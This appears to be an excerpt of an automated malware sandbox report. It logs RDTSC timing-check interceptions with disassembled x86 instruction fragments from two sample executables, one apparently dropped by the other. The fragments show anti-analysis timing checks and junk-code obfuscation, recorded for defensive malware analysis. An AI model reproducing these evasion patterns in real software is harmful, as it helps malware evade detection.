Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20784 second address: 4D20795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsd 0x0000000b rep movsd 0x0000000d rep movsd 0x0000000f rep movsd 0x00000011 rep movsd 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20795 second address: 4D20799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20799 second address: 4D2079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2079D second address: 4D207A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D207A3 second address: 4D207A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D207A9 second address: 4D207AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D207AD second address: 4D207B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D207B1 second address: 4D207E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a jmp 00007F70146AC613h 0x0000000f and ecx, 03h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F70146AC611h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D207E8 second address: 4D2081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rep movsb 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7014CC2CC8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2081B second address: 4D2082A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2082A second address: 4D20842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20842 second address: 4D20846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20846 second address: 4D20861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7014CC2CBAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20861 second address: 4D20867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20867 second address: 4D20898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7014CC2CC8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20898 second address: 4D2089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2089E second address: 4D208C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7014CC2CBCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D208C2 second address: 4D208DF instructions: 0x00000000 rdtsc 0x00000002 call 00007F70146AC612h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov dx, 9054h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D208DF second address: 4D20902 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr fs:[00000000h], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7014CC2CC1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20902 second address: 4D20917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20917 second address: 4D2091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2091C second address: 4D2093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a jmp 00007F70146AC60Fh 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx eax, di 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2093C second address: 4D20973 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 mov ebx, 6555D2BAh 0x0000000e popad 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F7014CC2CBDh 0x0000001a or ch, 00000036h 0x0000001d jmp 00007F7014CC2CC1h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20973 second address: 4D209B0 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F70146AC60Dh 0x0000000c pushfd 0x0000000d jmp 00007F70146AC610h 0x00000012 or ah, FFFFFF88h 0x00000015 jmp 00007F70146AC60Bh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D209B0 second address: 4D209C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D209C0 second address: 4D209D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 2AE883ADh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D209D9 second address: 4D2049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CC9h 0x00000008 mov esi, 69471DB7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 retn 0008h 0x00000013 cmp dword ptr [ebp-2Ch], 10h 0x00000017 mov eax, dword ptr [ebp-40h] 0x0000001a jnc 00007F7014CC2CB5h 0x0000001c push eax 0x0000001d lea edx, dword ptr [ebp-00000590h] 0x00000023 push edx 0x00000024 call esi 0x00000026 push 00000008h 0x00000028 jmp 00007F7014CC2CC6h 0x0000002d push 032520EDh 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20B6D second address: 4D20B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20B73 second address: 4D20B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20B77 second address: 4D20BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F70146AC619h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F70146AC60Ch 0x00000017 and esi, 75D20EC8h 0x0000001d jmp 00007F70146AC60Bh 0x00000022 popfd 0x00000023 mov si, 8C3Fh 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov di, 46C2h 0x00000030 call 00007F70146AC613h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A04C52 second address: A04C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A04C5F second address: A04C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A04C67 second address: A04C84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F7014CC2CBFh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F7014CC2CB6h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9FED8C second address: 9FED93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A03D24 second address: A03D2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A03D2A second address: A03D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A03FD4 second address: A03FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A03FD8 second address: A03FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jng 00007F70146AC606h 0x0000000f jp 00007F70146AC606h 0x00000015 jmp 00007F70146AC60Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A04161 second address: A04167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A04167 second address: A0417D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70146AC610h 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A0417D second address: A04195 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7014CC2CB6h 0x00000008 jp 00007F7014CC2CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F7014CC2CBEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A042E8 second address: A042EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A0601D second address: A0602D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CBCh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A0602D second address: A06031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06031 second address: A06053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7014CC2CC5h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06053 second address: A06059 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06059 second address: A0605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A0605F second address: A06063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06063 second address: A0608F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnc 00007F7014CC2CBCh 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+122D2A71h], ebx 0x00000017 call 00007F7014CC2CB9h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A0608F second address: A060AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A060AD second address: A060B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A060B1 second address: A060C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A060C3 second address: A060C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A060C7 second address: A06105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007F70146AC61Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jne 00007F70146AC60Ch 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06105 second address: A06115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06115 second address: A061C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F70146AC617h 0x0000000a popad 0x0000000b pop eax 0x0000000c mov dword ptr [ebp+122D35C4h], eax 0x00000012 push 00000003h 0x00000014 mov edx, 386EBC9Eh 0x00000019 push 00000000h 0x0000001b sub edx, dword ptr [ebp+122D38BDh] 0x00000021 push 00000003h 0x00000023 add dword ptr [ebp+122D34B2h], ecx 0x00000029 push 6C9AED7Bh 0x0000002e push edx 0x0000002f jmp 00007F70146AC617h 0x00000034 pop edx 0x00000035 add dword ptr [esp], 53651285h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F70146AC608h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 lea ebx, dword ptr [ebp+1244AD18h] 0x0000005c mov dword ptr [ebp+122D1C05h], ecx 0x00000062 add dword ptr [ebp+122D34B2h], edx 0x00000068 xchg eax, ebx 0x00000069 push ecx 0x0000006a pushad 0x0000006b jp 00007F70146AC606h 0x00000071 push ebx 0x00000072 pop ebx 0x00000073 popad 0x00000074 pop ecx 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a jno 00007F70146AC606h 0x00000080 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A061C0 second address: A061D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06275 second address: A06289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06289 second address: A062CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 4CCFBBF8h 0x0000000e mov dh, 2Dh 0x00000010 push 00000003h 0x00000012 mov dword ptr [ebp+122D358Ah], ebx 0x00000018 mov esi, dword ptr [ebp+122D36F1h] 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D2B91h], ecx 0x00000026 push 00000003h 0x00000028 sub ecx, dword ptr [ebp+122D3679h] 0x0000002e push 85C35E89h 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007F7014CC2CBCh 0x0000003b jnc 00007F7014CC2CB6h 0x00000041 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A062CA second address: A06319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3A3CA177h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F70146AC608h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F70146AC60Ah 0x0000002e lea ebx, dword ptr [ebp+1244AD23h] 0x00000034 mov esi, dword ptr [ebp+122D37FDh] 0x0000003a push eax 0x0000003b cld 0x0000003c pop ecx 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f jl 00007F70146AC60Ch 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A06319 second address: A06320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A18053 second address: A1806C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A271C3 second address: A271CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7014CC2CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A271CF second address: A271D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A271D3 second address: A27202 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7014CC2CC1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F7014CC2CC5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F9C8C second address: 9F9C91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F9C91 second address: 9F9C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F9C97 second address: 9F9CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F9CA3 second address: 9F9CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: 9F9CA9 second address: 9F9CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC60Ch 0x00000009 jmp 00007F70146AC618h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A252D6 second address: A252E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F7014CC2CBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A252E3 second address: A252FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 je 00007F70146AC606h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F70146AC606h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2545D second address: A25463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25463 second address: A25467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25467 second address: A25476 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F7014CC2CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25476 second address: A2547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A2547C second address: A25483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25887 second address: A258A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC615h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A259DD second address: A259E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25B65 second address: A25B6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70146AC606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25B6F second address: A25B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25B7A second address: A25B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECFIDGCBF.exe RDTSC instruction interceptor: First address: A25CC9 second address: A25CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
